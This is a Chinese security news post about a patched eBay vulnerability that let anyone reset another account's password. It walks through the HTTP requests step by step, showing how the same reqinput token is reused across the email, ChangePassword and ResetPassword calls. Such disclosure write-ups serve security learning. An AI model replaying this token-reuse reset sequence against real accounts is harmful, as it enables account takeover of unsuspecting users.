时隔4个月,eBay终修复重置任意账户密码漏洞

Web安全 SP小编
2014-09-23 9,154

 

ebay_reset_your_password_sec

 

 








一、故事是这样的:


    埃及安全研究员(话说最近埃及安全研究员挺多挺出彩的啊)Yasser H. Ali在4个月前发现了PayPal的任意跳转漏洞准备发给Paypal,朋友告知他得先注册eBay,然后才能反馈给Paypal;
    我们的这位埃及安全研究员在注册ebay的时候又发现了注册流程中的2个小漏洞,一并提交给了PayPal,并耐心等待了2天。第三天忍不住了,想登陆上去看看Paypal安全团队确认了没有,啊,
就像每次一样,Yasser忘记了自己密码(这里可能是幌子,Yasser就喜欢找密码重置漏洞),这有多么淡淡的忧伤。然后就操起了BurpSuite,最终因为瞟见2个一样的reqinput参数发现了这个重置任意账户密码漏洞。


    只要知道eBay用户邮箱或者id就可以实现重置此账户密码漏洞,要邮箱?5月份wordpress漏洞导致的ebay1.45亿用户信息泄露,不是分分钟满足了这一条件?

 

二、漏洞详情:



POST一个email
https://fyp.ebay.com/EnterUserInfo?ru=&clientapptype=&rmvhdr=
ru=&clientapptype=&reqinput=CCCCCCCCCCCCCCCCCCCCCCCCCCCCCC....CCC&rmvhdr=&__HPAB_token_text__=&__HPAB_token_string__=&captchaToken=&captchaStatus=&input=secpulse%40secpulse.com


 

点击发送邮件得到一个get请求,里面返回了reqinput参数

GET
/Email/?reqinput=AAAAAAAAAAAAAAAAAAAAAAAAAAAA...AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


 

ebay给用户发送的就是这么个重置密码连接,前提是执行了下面的url后才能执行最后一部url,否则通不过。

 

https://fyp.ebay.com/ChangePassword?reqinput=AAAAAAAAAAAAAAAAAAAAAAAAAAAA...AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

显然reqinput是一样的,那么黑客很容易就构造出来实现重置计划。

 

POST
/ResetPassword
reqinput=AAAAAAAAAAAAAAAAAAAAAAAAAAAA...AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&strengthmtr=3&pass=secpulse&rpass=secpulse


攻击流程图:

 

 

SP小编:
这位埃及安全研究员还才开始努力的学python啊,看来中国的安全研究水平更高一筹啊。现在eBay已经修复了这个漏洞,只是,竟然用了4个月,这效率,期间又有多少用户被重置了呢?sp小编看了一下现在的ebay的reqinput是2个不同长度的字符串。

 

 https://fyp.ebay.com/EnterUserInfo?ru=&clientapptype=&rmvhdr=
ru=&clientapptype=&reqinput=3c5879d9a42e41993bdced43f553326460551207149eb4998c28cbeeac543191&rmvhdr=&__HPAB_token_text__=&__HPAB_token_string__=&captchaToken=&captchaStatus=&input=secpulse%40secpulse.com

https://fyp.ebay.com/ChangePassword?reqinput=49b660bfd1c20d92f8503414945de7647e1031e6f15606843fef85c***f73ffb15769d5aa9c12d19b7456f51ab35e2cb3c3f4d4fc4bb29c050cb128795a269689357bf8a8f3f7fc9bb09567e5ba86e31

 

         相关地址:http://yasserali.com/?p=28;http://thehackernews.com/2014/09/hacking-ebay-accounts.html
          整理:SP小编
          SP地址:http://www.secpulse.com/archives/580.html

本文作者:SP小编

本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/588.html

Tags:
点赞: 0 评论:1 收藏: 0
新浪微博 QQ空间 微信扫一扫
评论  (1)
快来写下你的想法吧!
  • h3len 2014-09-24 17:22:23

    洞虽然简单 这蛋疼的老外还是挺细心的啊 定向目标还是危害挺大的 这ebay的效率不敢恭维啊

    回复

SP小编
文章数:209 积分: 25

交流和分享以及愉快的玩耍

安全问答社区

安全问答社区

脉搏官方公众号

脉搏公众号

活动日程

2022-06-17

Gdevops 全球敏捷运维峰会

2022-05-12

Mastering the Challenge!——来自The 3rd AutoCS 2022智能汽车信息安全大会的邀请函

2021-11-18

AutoSW 2021智能汽车软件开发大会

2021-06-27

2021中国国际网络安全博览会暨高峰论坛

2021-05-27

The 2nd AutoCS 2021智能汽车信息安全大会

2020-12-18

贝壳找房2020 ICS安全技术峰会

2020-12-11

全球敏捷运维峰会(Gdevops2020)

2020-12-04

2020京麒网络安全大会

2020-11-29

OPPO技术开放日第六期|聚焦应用与数据安全防护

2020-11-27

EISS-2020企业信息安全峰会之上海站 11.27

2020-09-24

CSDI summit中国软件研发管理行业技术峰会

2020-09-23

2020中国国际智慧能源暨能源数据中心与网络信息安全装备展览会

2020-07-31

EISS-2020企业信息安全峰会之北京站 | 7.31(周五线上)

2020-04-15

看雪.安恒 2020 KCTF 春季赛

2020-01-09

相约本地生活安全沙龙暨白帽子颁奖典礼